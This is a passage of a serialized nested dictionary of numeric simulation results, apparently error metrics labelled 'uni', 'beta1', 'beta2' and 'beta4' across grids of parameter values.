1.0751155224246156]}, 500: {'uni': 0.02812865188139113, 'beta1': 0.0009302726102285589, 'beta2': 0.28246276144047333, 'beta4': [0.003735251551528202, 1.0597034812793988]}, 400: {'uni': 0.028719991483692222, 'beta1': 0.0017210638478949442, 'beta2': 0.2521281788410891, 'beta4': [0.0057939649484265, 1.0568273537337944]}, 300: {'uni': 0.037442167799592474, 'beta1': 0.0029211389748540683, 'beta2': 0.28567597638856496, 'beta4': [0.007203252380980234, 1.0466619958682954]}, 200: {'uni': 0.06386556896150186, 'beta1': 0.007692212159565061, 'beta2': 0.3106853134678437, 'beta4': [0.008767209623206432, 1.0446977774575243]}, 150: {'uni': 0.07299108201427365, 'beta1': 0.009718847056601669, 'beta2': 0.35201252209709477, 'beta4': [0.01224241715996128, 1.037131011344825]}, 100: {'uni': 0.10404627177637138, 'beta1': 0.022002753992872198, 'beta2': 0.4027319974479996, 'beta4': [0.022041507551256105, 1.0283267345056883]}, 75: {'uni': 0.14415530253194253, 'beta1': 0.037313404141351224, 'beta2': 0.4487551520582601, 'beta4': [0.02308272957055226, 1.024847369129623]}, 50: {'uni': 0.18248580783173268, 'beta1': 0.06745752768881445, 'beta2': 0.5947234162875032, 'beta4': [0.03627165827218634, 1.023766184264096]}, 30: {'uni': 0.32010167971071957, 'beta1': 0.15819047328158758, 'beta2': 0.5964957292802823, 'beta4': [0.05138985807089626, 1.0189550791244228]}, 20: {'uni': 0.39132132239254896, 'beta1': 0.22935783878929317, 'beta2': 0.6897849051318254, 'beta4': [0.0708944891337828, 1.016073773033508]}, 10: {'uni': 0.633040103484694, 'beta1': 0.47854921461048383, 'beta2': 0.8056053943120505, 'beta4': [0.10927439293108314, 1.0129604700427997]}}, 500: {1000: {'uni': 0.02104866521905844, 'beta1': 0.0011076284762351462, 'beta2': 0.2455918455759565, 'beta4': [0.004128660183094929, 1.1046783319382874]}, 750: {'uni': 0.021757644812859883, 'beta1': 0.0013214567659403334, 'beta2': 0.2521007069597216, 'beta4': [0.003648828733603831, 1.098452444443017]}, 500: {'uni': 0.025306401204840658, 'beta1': 0.0012633210587387736, 'beta2': 0.2634180726409405, 'beta4': [0.004378750756189057, 1.0828752514482893]}, 400: {'uni': 0.03287825204093101, 'beta1': 0.0014649065692894452, 'beta2': 0.29674790610489143, 'beta4': [0.005038844169335943, 1.0820989472446443]}, 300: {'uni': 0.03919582437697649, 'beta1': 0.0032964478006695897, 'beta2': 0.28786217514683415, 'beta4': [0.005155953968189604, 1.0727548580615853]}, 200: {'uni': 0.05265772859784692, 'beta1': 0.007179735146244032, 'beta2': 0.32819508372958256, 'beta4': [0.010450188839043964, 1.0555283397540252]}, 150: {'uni': 0.07426215980201245, 'beta1': 0.01071226895358679, 'beta2': 0.346592044637774, 'beta4': [0.011794864375166105, 1.0557565101703543]}, 100: {'uni': 0.09473751106227296, 'beta1': 0.020243396397742374, 'beta2': 0.40449469255381554, 'beta4': [0.016063490757556757, 1.043220122669047]}, 75: {'uni': 0.1526544667465516, 'beta1': 0.05565631922498948, 'beta2': 0.4948063047875674, 'beta4': [0.028189581940918265, 1.0438445988295184]}, 50: {'uni': 0.19264485864816036, 'beta1': 0.05989197049685187, 'beta2': 0.511997231910665, 'beta4': [0.036553687466457846, 1.0339604748795699]}, 30: {'uni': 0.28834715829751595, 'beta1': 0.1510890312715177, 'beta2': 0.589643860381959, 'beta4': [0.05150135594467901, 1.0281633332742106]}, 20: {'uni': 0.4234892194088218, 'beta1': 0.24125642146873605, 'beta2': 0.6532763993515733, 'beta4': [0.0787906083401277, 1.0224514492768015]}, 10: {'uni': 0.6373839649057689, 'beta1': 0.4687121970847603, 'beta2': 0.8065683045396626, 'beta4': [0.10620791541316066, 1.0176075022605533]}}, 400: {1000: {'uni': 0.029961593391199526, 'beta1': 0.0013213432517489214, 'beta2': 0.316112362691536, 'beta4': [0.0062188760201176375, 1.1284533576800397]}, 750: {'uni': 0.039777492934285896, 'beta1': 0.001508579177318669, 'beta2': 0.26143774121719054, 'beta4': [0.004763534234071238, 1.129866844282858]}, 500: {'uni': 0.027808281938736364, 'beta1': 0.002235578290604194, 'beta2': 0.2766486730364398, 'beta4': [0.005669313513005218, 1.1070477515133545]}, 400: {'uni': 0.03448721993106457, 'beta1': 0.002060896148615263, 'beta2': 0.2778739245365818, 'beta4': [0.005947201799245449, 1.1007850822479124]}, 300: {'uni': 0.038881825703913186, 'beta1': 0.0022205198114061166, 'beta2': 0.3449535264664368, 'beta4': [0.006411456500606179, 1.0867240695066167]}, 200: {'uni': 0.050601381926499364, 'beta1': 0.007855702997021598, 'beta2': 0.3119624149190063, 'beta4': [0.009781905195309765, 1.0781068487788759]}, 150: {'uni': 0.08081326564454214, 'beta1': 0.017136945406907373, 'beta2': 0.33243652782842975, 'beta4': [0.015865869842987972, 1.0692547767185392]}, 100: {'uni': 0.10273800778525288, 'beta1': 0.01999439686782297, 'beta2': 0.36994464265717686, 'beta4': [0.01653887961667779, 1.0555295877630724]}, 75: {'uni': 0.1259534595047032, 'beta1': 0.034388184145579245, 'beta2': 0.41308332325358277, 'beta4': [0.020239833747756678, 1.049561450582556]}, 50: {'uni': 0.1849579302990263, 'beta1': 0.07194816166882964, 'beta2': 0.5263002506691301, 'beta4': [0.030427049802672235, 1.0383309410150727]}, 30: {'uni': 0.29600170578233825, 'beta1': 0.12149484405151426, 'beta2': 0.5963678413155551, 'beta4': [0.055869335451423426, 1.0350485321179137]}, 20: {'uni': 0.4076696162001894, 'beta1': 0.27875125626527186, 'beta2': 0.6589684457465328, 'beta4': [0.07279883473388286, 1.0287125415345189]}, 10: {'uni': 0.6334440096496123, 'beta1': 0.4774986007980533, 'beta2': 0.8060685291046624, 'beta4': [0.10574684271567839, 1.0218591798545416]}}, 300: {1000: {'uni': 0.040572771380711144, 'beta1': 0.0028585526771383826, 'beta2': 0.3400160777578032, 'beta4': [0.007736399745246395, 1.1863024489259968]}, 750: {'uni': 0.04299416638630284, 'beta1': 0.002969868017451892, 'beta2': 0.2909040336627516, 'beta4': [0.007000230903639683, 1.1459452626888829]}, 500: {'uni': 0.05125391371795476, 'beta1': 0.002165638761144419, 'beta2': 0.30806868145586364, 'beta4': [0.005871679176627796, 1.1511125842098944]}, 400: {'uni': 0.04503334265214086, 'beta1': 0.0023602480297385017, 'beta2': 0.3301573120464285, 'beta4': [0.005448144002562095, 1.145418767540703]}, 300: {'uni': 0.044520962521187445, 'beta1': 0.003065998702340159, 'beta2': 0.3114521080701248, 'beta4': [0.006251618359843171, 1.118905728758287]}, 200: {'uni': 0.05777226508003848, 'beta1': 0.006768243637099554, 'beta2': 0.3236793485763856, 'beta4': [0.008218350087491232, 1.0969879140078251]}, 150: {'uni': 0.08387495266946396, 'beta1': 0.010696581160994418, 'beta2': 0.3565871015349815, 'beta4': [0.01144643737733734, 1.0873803983499324]}, 100: {'uni': 0.10709220720060389, 'beta1': 0.03215236993520353, 'beta2': 0.39545976429996976, 'beta4': [0.01766019366672807, 1.0818261167328507]}, 75: {'uni': 0.1401149186955662, 'beta1': 0.04354744217174392, 'beta2': 0.4521360551441519, 'beta4': [0.024005024384320558, 1.0673838858138462]}, 50: {'uni': 0.19916349358035706, 'beta1': 0.05995508419162838, 'beta2': 0.4958590133326075, 'beta4': [0.032857961472088894, 1.0667769493972883]}, 30: {'uni': 0.30982126533332466, 'beta1': 0.1341973395058801, 'beta2': 0.5631122123039468, 'beta4': [0.052474472496597306, 1.0445759847739207]}, 20: {'uni': 0.44932270699336363, 'beta1': 0.2356147017439962, 'beta2': 0.6447178052807758, 'beta4': [0.07448923790120071, 1.0377852803437868]}, 10: {'uni': 0.6199778343521001, 'beta1': 0.4979560542799865, 'beta2': 0.8017114529605197, 'beta4': [0.1056367550997906, 1.033874766370601]}}, 200: {1000: {'uni': 0.06242982893046301, 'beta1': 0.006311543311467927, 'beta2': 0.3546209775823574, 'beta4': [0.011478130136808503, 1.2109739309006156]}, 750: {'uni': 0.052645349892701816, 'beta1': 0.00713333042905062, 'beta2': 0.35074257146111876, 'beta4': [0.0105252868048244, 1.2171709487406868]}, 500: {'uni': 0.0585692402437379, 'beta1': 0.005896496236549341, 'beta2': 0.3170457782036068, 'beta4': [0.010683921303693576, 1.1842346463599915]}, 400: {'uni': 0.06290504904317053, 'beta1': 0.006712146741219611, 'beta2': 0.3613015164572914, 'beta4': [0.010733396037533883, 1.1849658508273218]}, 300: {'uni': 0.06631100580163242, 'beta1': 0.005249788236707511, 'beta2': 0.3412605845181866, 'beta4': [0.011532162132481623, 1.1808880298303235]}, 200: {'uni': 0.05872088995242879, 'beta1': 0.010287989073223893, 'beta2': 0.44114280047537957, 'beta4': [0.00940073797560703, 1.1526662372069578]}, 150: {'uni': 0.08680495004311953, 'beta1': 0.010432318675711202, 'beta2': 0.369518802507579, 'beta4': [0.011286805439364736, 1.120530358597126]}, 100: {'uni': 0.10514360043392249, 'beta1': 0.022843793816391938, 'beta2': 0.3990470778297997, 'beta4': [0.015352115793283905, 1.1111111828101878]}, 75: {'uni': 0.1548412719042399, 'beta1': 0.03497861146212196, 'beta2': 0.445642088740141, 'beta4': [0.024145019301651638, 1.1051082659349265]}, 50: {'uni': 0.19564761821360332, 'beta1': 0.06808577885293414, 'beta2': 0.4993873294578854, 'beta4': [0.027713298941496742, 1.0881906064783706]}, 30: {'uni': 0.3052472539595662, 'beta1': 0.12861243803016686, 'beta2': 0.5839087481358557, 'beta4': [0.05379333122729778, 1.0638546764114587]}, 20: {'uni': 0.42157212241427794, 'beta1': 0.2969555420165084, 'beta2': 0.6281606948650471, 'beta4': [0.06813417382770101, 1.0565341199655685]}, 10: {'uni': 0.6484698436861565, 'beta1': 0.5003510754676674, 'beta2': 0.7699596346968957, 'beta4': [0.11317240911394794, 1.0456765098967737]}}, 150: {1000: {'uni': 0.08366248595753015, 'beta1': 0.010446216149631336, 'beta2': 0.3932715459128066, 'beta4': [0.011561818709477627, 1.305602936248631]}, 750: {'uni': 0.07118697101283993, 'beta1': 0.01599980521069211, 'beta2': 0.4054713674024028, 'beta4': [0.015584562017383204, 1.2956283529452284]}, 500: {'uni': 0.08579946452689481, 'beta1': 0.011882995152922274, 'beta2': 0.41246933746770353, 'beta4': [0.01230725834002692, 1.2908217120418506]}, 400: {'uni': 0.10206478064567753, 'beta1': 0.010533507293093415, 'beta2': 0.37815775687446657, 'beta4': [0.013644516225509768, 1.2377646001800173]}, 300: {'uni': 0.06696098811374691, 'beta1': 0.015707664590499864, 'beta2': 0.36108061087642107, 'beta4': [0.011243078434367986, 1.2209644625062315]}, 200: {'uni': 0.07582632025632613, 'beta1': 0.018921317191341738, 'beta2': 0.47381975709885216, 'beta4': [0.009876617862388208, 1.1808296909941922]}, 150: {'uni': 0.07630227709705345, 'beta1': 0.011433401525463767, 'beta2': 0.35839012304833423, 'beta4': [0.012818986604319665, 1.1802180500312938]}, 100: {'uni': 0.10786524730960866, 'beta1': 0.023480822442160966, 'beta2': 0.3971224363546612, 'beta4': [0.01709550425962655, 1.151116255963359]}, 75: {'uni': 0.13969696753181376, 'beta1': 0.03894177698361236, 'beta2': 0.46715246191361925, 'beta4': [0.024033296209019752, 1.1264838497994534]}, 50: {'uni': 0.22699845146544836, 'beta1': 0.06872062711213502, 'beta2': 0.5219019735135487, 'beta4': [0.031972705924561626, 1.127262590512302]}, 30: {'uni': 0.3054153298488651, 'beta1': 0.16648267461758534, 'beta2': 0.5606383325792897, 'beta4': [0.05706286020859661, 1.084204159768233]}, 20: {'uni': 0.4190052140990755, 'beta1': 0.23938694526158966, 'beta2': 0.6567567086969817, 'beta4': [0.06063104673629702, 1.0765768348326303]}, 10: {'uni': 0.6476542690569347, 'beta1': 0.5041556276697949, 'beta2': 0.7851190350954672, 'beta4': [0.10573852458138985, 1.0651944694890478]}}, 100: {1000: {'uni': 0.1036434876877887, 'beta1': 0.022364853152579772, 'beta2': 0.5292843993585943, 'beta4': [0.02314691582316915, 1.4467707103679326]}, 750: {'uni': 0.10335029362377335, 'beta1': 0.030060385136366257, 'beta2': 0.4208440719945956, 'beta4': [0.019280741475252636, 1.4088886174584125]}, 500: {'uni': 0.10376192559298011, 'beta1': 0.023777122143537794, 'beta2': 0.5616028046723718, 'beta4': [0.024082841464177725, 1.4090081022445462]}, 400: {'uni': 0.13631741533589026, 'beta1': 0.02388755267987828, 'beta2': 0.49195520157294537, 'beta4': [0.020305042646486506, 1.3649746644812781]}, 300: {'uni': 0.13432139541589827, 'beta1': 0.023480683123979638, 'beta2': 0.4061390685762313, 'beta4': [0.02388635447192918, 1.3133212077424719]}, 200: {'uni': 0.12739786607587839, 'beta1': 0.020107519579753312, 'beta2': 0.45952481877063966, 'beta4': [0.021929161477884124, 1.2871761359143647]}, 150: {'uni': 0.10898370722109206, 'beta1': 0.0294913822797383, 'beta2': 0.5126319119168943, 'beta4': [0.017117421378655046, 1.2559742846324167]}, 100: {'uni': 0.12173415399962331, 'beta1': 0.029129867966793198, 'beta2': 0.5070227168049106, 'beta4': [0.01683981545477253, 1.246721863000209]}, 75: {'uni': 0.13498049555541441, 'beta1': 0.040464719589934244, 'beta2': 0.493025079772468, 'beta4': [0.02304366181944447, 1.1964882870163205]}, 50: {'uni': 0.19534608713221155, 'beta1': 0.0741369784036267, 'beta2': 0.5183169385473728, 'beta4': [0.034831165872610405, 1.1949239176282795]}, 30: {'uni': 0.30805816742549175, 'beta1': 0.1664021904025582, 'beta2': 0.5594858087243508, 'beta4': [0.05065502968190902, 1.1277215135863552]}, 20: {'uni': 0.4129540972085036, 'beta1': 0.22505442505495474, 'beta2': 0.6586789797514485, 'beta4': [0.06766096112265912, 1.1402723916542454]}, 10: {'uni': 0.6573864598611118, 'beta1': 0.4684846064556031, 'beta2': 0.794366053169467, 'beta4': [0.11468185689905351, 1.0863010136620521]}}, 75: {1000: {'uni': 0.18058180891528738, 'beta1': 0.037801701091263615, 'beta2': 0.5375554079408202, 'beta4': [0.022627377065022616, 1.6468214031174047]}, 750: {'uni': 0.17043142639842407, 'beta1': 0.042323861627189194, 'beta2': 0.5726471250293982, 'beta4': [0.027701870488874847, 1.4761000056892333]}, 500: {'uni': 0.1623261189491226, 'beta1': 0.04190800730982917, 'beta2': 0.5307750705381211, 'beta4': [0.02461383433205972, 1.4697198929879072]}, 400: {'uni': 0.16145797819679752, 'beta1': 0.03647548901238954, 'beta2': 0.5315701591627016, 'beta4': [0.02647811576481531, 1.4535080057475438]}, 300: {'uni': 0.15530089279897658, 'beta1': 0.03237409300356481, 'beta2': 0.5516168967599163, 'beta4': [0.021442907821948645, 1.4123882699990165]}, 200: {'uni': 0.17697523696823808, 'beta1': 0.04474700247588399, 'beta2': 0.5972192196010739, 'beta4': [0.02425642206461014, 1.3622012159367398]}, 150: {'uni': 0.18022118040525992, 'beta1': 0.04973126406029865, 'beta2': 0.5575656144691391, 'beta4': [0.041701851682596956, 1.3762461426964758]}, 100: {'uni': 0.16433779080943353, 'beta1': 0.05197785747946283, 'beta2': 0.7125558130922166, 'beta4': [0.021594167934128383, 1.277995498756572]}, 75: {'uni': 0.15574035820942522, 'beta1': 0.03753623782874999, 'beta2': 0.6594361088676222, 'beta4': [0.03041572556389392, 1.3035561091028944]}, 50: {'uni': 0.18528367625092257, 'beta1': 0.058418019883555695, 'beta2': 0.5859983026896285, 'beta4': [0.03287075645889381, 1.197963424643406]}, 30: {'uni': 0.33717193717239086, 'beta1': 0.15972206611315357, 'beta2': 0.6312902712515196, 'beta4': [0.053274124739167164, 1.1818333324712798]}, 20: {'uni': 0.3778933771594146, 'beta1': 0.24660391594637412, 'beta2': 0.6258005697368938, 'beta4': [0.06425956306492152, 1.1835172283435373]}, 10: {'uni': 0.6436618954411614, 'beta1': 0.46316810126751673, 'beta2': 0.7811380357663973, 'beta4': [0.10631223882126731, 1.1150057118472687]}}, 50: {1000: {'uni': 0.25808978521407333, 'beta1': 0.15286500185699975, 'beta2': 0.5826925265510525, 'beta4': [0.034467286889795036, 1.5864361747408757]}, 750: {'uni': 0.2456412375307066, 'beta1': 0.09688410933656752, 'beta2': 0.6623046558218882, 'beta4': [0.0386809666782265, 1.7464944613556568]}, 500: {'uni': 0.2690821708539631, 'beta1': 0.10807263816836116, 'beta2': 0.6208916018976451, 'beta4': [0.04208865557048511, 1.8588053084450398]}, 400: {'uni': 0.30779724152757976, 'beta1': 0.07008374742747679, 'beta2': 0.6563945987856405, 'beta4': [0.037440644670713945, 1.567814559277183]}, 300: {'uni': 0.24357058167621404, 'beta1': 0.07610853729969821, 'beta2': 0.6351194247134633, 'beta4': [0.04234563975675384, 1.6172451253474347]}, 200: {'uni': 0.2363976999457054, 'beta1': 0.08107649857407076, 'beta2': 0.6736222653167869, 'beta4': [0.036278935272213875, 1.5304741409120481]}, 150: {'uni': 0.2610121772600879, 'beta1': 0.0970721039952632, 'beta2': 0.6373563878119448, 'beta4': [0.039267605566479145, 1.6152863379484848]}, 100: {'uni': 0.25887956260664496, 'beta1': 0.0749904503307929, 'beta2': 0.6053419211526976, 'beta4': [0.04457433007738977, 1.4866090790047208]}, 75: {'uni': 0.26824734647328496, 'beta1': 0.12671407341083857, 'beta2': 0.7088195394325436, 'beta4': [0.036659734617877866, 1.4757908941788034]}, 50: {'uni': 0.2157848876945146, 'beta1': 0.179047877195215, 'beta2': 0.6430388460295624, 'beta4': [0.0391000990025914, 1.3557498703015833]}, 30: {'uni': 0.3192054118087819, 'beta1': 0.1401721849908211, 'beta2': 0.8343938671057323, 'beta4': [0.04470518427368649, 1.2932248331626337]}, 20: {'uni': 0.44510976621687803, 'beta1': 0.21980400379396323, 'beta2': 0.700861422059113, 'beta4': [0.0769617944142653, 1.2345363706331847]}, 10: {'uni': 0.6347832511266515, 'beta1': 0.46188004670925575, 'beta2': 0.7495583632205935, 'beta4': [0.1305758638756061, 1.2022133212025055]}}, 30: {1000: {'uni': 0.42892879393806227, 'beta1': 0.2900339381216153, 'beta2': 0.9179423439811932, 'beta4': [0.06714029920409238, 2.1317261773472023]}, 750: {'uni': 0.4319538785876898, 'beta1': 0.27188371653759374, 'beta2': 0.9805852295742616, 'beta4': [0.070835223582246, 1.9229053732675119]}, 500: {'uni': 0.5337901444492364, 'beta1': 0.2829226601033528, 'beta2': 0.9905448799057903, 'beta4': [0.07612682556429423, 2.076515079639593]}, 400: {'uni': 0.39881851895745213, 'beta1': 0.26899106022077685, 'beta2': 0.9024444948214578, 'beta4': [0.05401799877222632, 1.8734518365407848]}, 300: {'uni': 0.6739736484193996, 'beta1': 0.2727368263724961, 'beta2': 0.9523117920073443, 'beta4': [0.05673109471662844, 2.063349821863002]}, 200: {'uni': 0.5330467944857724, 'beta1': 0.23457124841939445, 'beta2': 0.9209146724782004, 'beta4': [0.05392848614071637, 2.1843840064284774]}, 150: {'uni': 0.42169483702592286, 'beta1': 0.23102624314533526, 'beta2': 1.0957735143101772, 'beta4': [0.059481382178213825, 2.1216513918653437]}, 100: {'uni': 0.6626893623786265, 'beta1': 0.26768286418498294, 'beta2': 0.9158900858984962, 'beta4': [0.06812396698026751, 1.699363398801483]}, 75: {'uni': 0.40272005064764316, 'beta1': 0.30576524079527273, 'beta2': 0.8537642594078427, 'beta4': [0.05500177232308054, 1.759340527948887]}, 50: {'uni': 0.4454592863478265, 'beta1': 0.22504133999635, 'beta2': 0.895156147172035, 'beta4': [0.06047032418708357, 1.6131334609036276]}, 30: {'uni': 0.4770799136690089, 'beta1': 0.28771044466108114, 'beta2': 0.9915883541772491, 'beta4': [0.05533692052705431, 1.5508614397335567]}, 20: {'uni': 0.47782291469689375, 'beta1': 0.2938634148011197, 'beta2': 1.0424979003898318, 'beta4': [0.0647423513839497, 1.4508953034317449]}, 10: {'uni': 0.7269557754136924, 'beta1': 0.543897763233955, 'beta2': 1.4307116481814752, 'beta4': [0.10876709935086068, 1.325984870412566]}}, 20: {1000: {'uni': 0.7184217429237197, 'beta1': 0.4206672630068364, 'beta2': 1.1613123688886902, 'beta4': [0.0965283978439124, 2.269289374072948]}, 750: {'uni': 0.8534940710908991, 'beta1': 0.5750736583955173, 'beta2': 1.5370822261631976, 'beta4': [0.11705211724316403, 2.3985476027245425]}, 500: {'uni': 0.7100015488711899, 'beta1': 0.6055030167508085, 'beta2': 1.3366756110977158, 'beta4': [0.08901810252717048, 2.5039934903960024]}, 400: {'uni': 1.024882066657459, 'beta1': 0.6339328801184981, 'beta2': 1.3420862247975562, 'beta4': [0.11404947586800851, 2.286363998147505]}, 300: {'uni': 0.7865904251052587, 'beta1': 0.6071705295391215, 'beta2': 1.2856926816307097, 'beta4': [0.12113879919712968, 2.5946298846866784]}, 200: {'uni': 0.9392908385222309, 'beta1': 0.5745637648665203, 'beta2': 1.1427799247137727, 'beta4': [0.11765217795293076, 2.3656722555394056]}, 150: {'uni': 1.0463030353811855, 'beta1': 0.505199427703051, 'beta2': 1.136751565860195, 'beta4': [0.08916754586166624, 2.3244992955685637]}, 100: {'uni': 0.7096332746322297, 'beta1': 0.6584700089137518, 'beta2': 1.1955612879172697, 'beta4': [0.0793400828260651, 2.0810546674001063]}, 75: {'uni': 0.5686801021941732, 'beta1': 0.9064292489368356, 'beta2': 1.3967282306451674, 'beta4': [0.08123013465573295, 2.0910440423359367]}, 50: {'uni': 0.776933863952061, 'beta1': 0.6292461657268993, 'beta2': 1.554076323925928, 'beta4': [0.08839935153937976, 2.0327820301000203]}, 30: {'uni': 0.8454812842111926, 'beta1': 0.5691239590988605, 'beta2': 1.5452301545383769, 'beta4': [0.07962479640843732, 1.7801768614752502]}, 20: {'uni': 0.7155766744358403, 'beta1': 0.5367615346103896, 'beta2': 1.3929673945151635, 'beta4': [0.08547240159964724, 1.735089005961175]}, 10: {'uni': 0.814156374135484, 'beta1': 0.6943350919872927, 'beta2': 1.2256108824087348, 'beta4': [0.11175964139287464, 1.531470926335231]}}, 10: {1000: {'uni': 2.1502607486814758, 'beta1': 2.961193440812989, 'beta2': 3.6605411238614165, 'beta4': [0.1685138308258897, 4.444830757691141]}, 750: {'uni': 2.048526112731403, 'beta1': 4.151762896697908, 'beta2': 2.3424163082460217, 'beta4': [0.17031697375504729, 6.406286404246016]}, 500: {'uni': 2.495870260411924, 'beta1': 3.011726545286237, 'beta2': 3.2570697722296176, 'beta4': [0.1655469571590933, 5.777875203382532]}, 400: {'uni': 2.099881963929635, 'beta1': 2.329850145831139, 'beta2': 2.5795427219498634, 'beta4': [0.1891660716402167, 4.113063534228842]}, 300: {'uni': 2.789000548267903, 'beta1': 3.3427408254436237, 'beta2': 2.838444995116569, 'beta4': [0.18080810485975166, 5.743157914926659]}, 200: {'uni': 2.714319577071239, 'beta1': 2.674969297747632, 'beta2': 4.072106365271376, 'beta4': [0.1673096893670284, 4.156795438643065]}, 150: {'uni': 2.0149494775741075, 'beta1': 2.077635206644789, 'beta2': 3.078141288269228, 'beta4': [0.18767729882393866, 4.360721452118907]}, 100: {'uni': 1.9624533144767615, 'beta1': 3.019315635257828, 'beta2': 4.385469655540163, 'beta4': [0.1900315552805855, 3.3758081408933553]}, 75: {'uni': 2.6676512104969414, 'beta1': 5.305550512983561, 'beta2': 3.1206067511159787, 'beta4': [0.18286929913842218, 4.0556761458530515]}, 50: {'uni': 1.7764267325813035, 'beta1': 3.9516861090331017, 'beta2': 2.409413746837362, 'beta4': [0.17075107365496775, 3.4929925209103336]}, 30: {'uni': 1.979122970210084, 'beta1': 2.7491634214533307, 'beta2': 4.072617355039488, 'beta4': [0.2180077625841771, 3.2609298387610655]}, 20: {'uni': 1.8375355117463443, 'beta1': 2.3463533042171085, 'beta2': 2.503163105574244, 'beta4': [0.21114898088540743, 2.787162687085637]}, 10: {'uni': 2.427976117487353, 'beta1': 2.291521208099949, 'beta2': 2.944087053867329, 'beta4': [0.17835194176860436, 2.5696040508544296]}}}, 0.2: {1000: {1000: {'uni': 0.012280780292956572, 'beta1': 0.0002693384381689057, 'beta2': 0.2090690518552283, 'beta4': [0.0018020663792893063, 1.0502132198035559]}, 750: {'uni': 0.01651843115887509, 'beta1': 0.0005487421176163686, 'beta2': 0.20148442431487518, 'beta4': [0.0024425787732128127, 1.0477212885148937]}, 500: {'uni': 0.025353088253298767, 'beta1': 0.0010396605293617447, 'beta2': 0.23966111809097265, 'beta4': [0.0034985508949701427, 1.038970161345098]}, 400: {'uni': 0.030198518441976466, 'beta1': 0.0012021829507310755, 'beta2': 0.2594658028963883, 'beta4': [0.004490616440973693, 1.0371676882826277]}, 300: {'uni': 0.04730794946255178, 'beta1': 0.0031329041561488774, 'beta2': 0.28118782311034385, 'beta4': [0.006281029145284682, 1.0325050480220268]}, 200: {'uni': 0.05761447368464398, 'beta1': 0.00673361604946926, 'beta2': 0.2975256995575922, 'beta4': [0.009157081044446456, 1.0260278761104196]}, 150: {'uni': 0.07591819198214711, 'beta1': 0.013946942490422313, 'beta2': 0.34576552304435454, 'beta4': [0.011552729481228095, 1.0240945498285348]}, 100: {'uni': 0.1368580302706355, 'beta1': 0.02526249569893405, 'beta2': 0.38557800822543326, 'beta4': [0.019884020172808305, 1.0191300056011763]}, 75: {'uni': 0.1287872905890261, 'beta1': 0.030867395988007203, 'beta2': 0.4469931272901678, 'beta4': [0.02345546040016165, 1.0175172104748686]}, 50: {'uni': 0.1886157640394165, 'beta1': 0.06213874888664438, 'beta2': 0.4968675395552036, 'beta4': [0.031118814289369752, 1.015031367073955]}, 30: {'uni': 0.3360712300993455, 'beta1': 0.14289602608957086, 'beta2': 0.5929558125978679, 'beta4': [0.05283026319228742, 1.0118317036567743]}, 20: {'uni': 0.37439596985315937, 'beta1': 0.19104466956177601, 'beta2': 0.6679428647952825, 'beta4': [0.058414984981661984, 1.0110032494290406]}, 10: {'uni': 0.5889445132413289, 'beta1': 0.41592284653448874, 'beta2': 0.7578871781713459, 'beta4': [0.09012671207857803, 1.0074859980250308]}}, 750: {1000: {'uni': 0.0146304743338266, 'beta1': 0.0005353139672967838, 'beta2': 0.21543389133258695, 'beta4': [0.002897910486266618, 1.068844018212424]}, 750: {'uni': 0.016626630038685863, 'beta1': 0.000506508364560486, 'beta2': 0.2414624038752328, 'beta4': [0.00262856495812392, 1.0640476852072571]}, 500: {'uni': 0.022089331148686053, 'beta1': 0.0009422277350338522, 'beta2': 0.2479237578547018, 'beta4': [0.003432339519279511, 1.0569707861052167]}, 400: {'uni': 0.030814483057757476, 'beta1': 0.0022416542674890327, 'beta2': 0.24616751839453985, 'beta4': [0.004434707962325523, 1.0509906076614757]}, 300: {'uni': 0.03912077527542531, 'beta1': 0.002888923108919827, 'beta2': 0.2618563052834662, 'beta4': [0.005607512772963669, 1.0431435805548956]}, 200: {'uni': 0.0589807671507729, 'beta1': 0.0064499974624839486, 'beta2': 0.3105643336337045, 'beta4': [0.011864309357212723, 1.0353157317081894]}, 150: {'uni': 0.07154171520476793, 'beta1': 0.009202361892378634, 'beta2': 0.3433516617468062, 'beta4': [0.012041150326569453, 1.030658596755859]}, 100: {'uni': 0.11355909804218103, 'beta1': 0.016742564920940374, 'beta2': 0.4408459910322566, 'beta4': [0.01589543424873943, 1.0259719809454315]}, 75: {'uni': 0.1470273339563956, 'beta1': 0.04125038029241875, 'beta2': 0.45674725702545044, 'beta4': [0.022555544574912895, 1.0233327169256352]}, 50: {'uni': 0.20394668402714952, 'beta1': 0.05372064930491053, 'beta2': 0.5123425216124959, 'beta4': [0.0304452000024452, 1.0200138365664115]}, 30: {'uni': 0.29386982148971175, 'beta1': 0.11208120239277584, 'beta2': 0.566212490043836, 'beta4': [0.05037312077653552, 1.0162468129423625]}, 20: {'uni': 0.4163288316571464, 'beta1': 0.1957238486090897, 'beta2': 0.6485082504821236, 'beta4': [0.06315650633950089, 1.0124363037896646]}, 10: {'uni': 0.5941397773736758, 'beta1': 0.4652476209261588, 'beta2': 0.7793225324115746, 'beta4': [0.09474615964960159, 1.0118194733649668]}}, 500: {1000: {'uni': 0.02108754785696739, 'beta1': 0.000828450449946846, 'beta2': 0.23804932124856504, 'beta4': [0.003958299034384424, 1.0966419370784732]}, 750: {'uni': 0.0231126438648383, 'beta1': 0.0011984870212622199, 'beta2': 0.24394501858530787, 'beta4': [0.003959031038270082, 1.091515598515446]}, 500: {'uni': 0.022275983484612037, 'beta1': 0.0013732758438846776, 'beta2': 0.2388404713964999, 'beta4': [0.003877722834733257, 1.0768224445920325]}, 400: {'uni': 0.02715548978278476, 'beta1': 0.0014775685950695514, 'beta2': 0.2484098395121755, 'beta4': [0.004386814061610222, 1.0687088791174149]}, 300: {'uni': 0.04498460516730482, 'beta1': 0.003852979657961273, 'beta2': 0.28089547945046694, 'beta4': [0.006194097426606414, 1.0599273761126238]}, 200: {'uni': 0.060660963828962605, 'beta1': 0.005071898129623075, 'beta2': 0.3407020595992429, 'beta4': [0.008591729401854804, 1.0615248105680746]}, 150: {'uni': 0.08186611317553552, 'beta1': 0.009229562012829961, 'beta2': 0.3249653471688221, 'beta4': [0.011742812742923414, 1.0477046573914812]}, 100: {'uni': 0.14183665282462907, 'beta1': 0.02592201655783873, 'beta2': 0.4317014020935504, 'beta4': [0.017506491846792815, 1.0396479032970523]}, 75: {'uni': 0.13469268827271816, 'beta1': 0.03072455411464323, 'beta2': 0.40854305278610353, 'beta4': [0.023802069158570326, 1.0345503480689766]}, 50: {'uni': 0.2267326479955361, 'beta1': 0.06283204007090228, 'beta2': 0.47352253571629066, 'beta4': [0.03299971248019334, 1.0307427172444934]}, 30: {'uni': 0.30926013693933796, 'beta1': 0.12802403468984566, 'beta2': 0.5919033598519557, 'beta4': [0.0446428946566547, 1.024235192981656]}, 20: {'uni': 0.36495683958552094, 'beta1': 0.21502934587386965, 'beta2': 0.655814111969914, 'beta4': [0.0668219237466946, 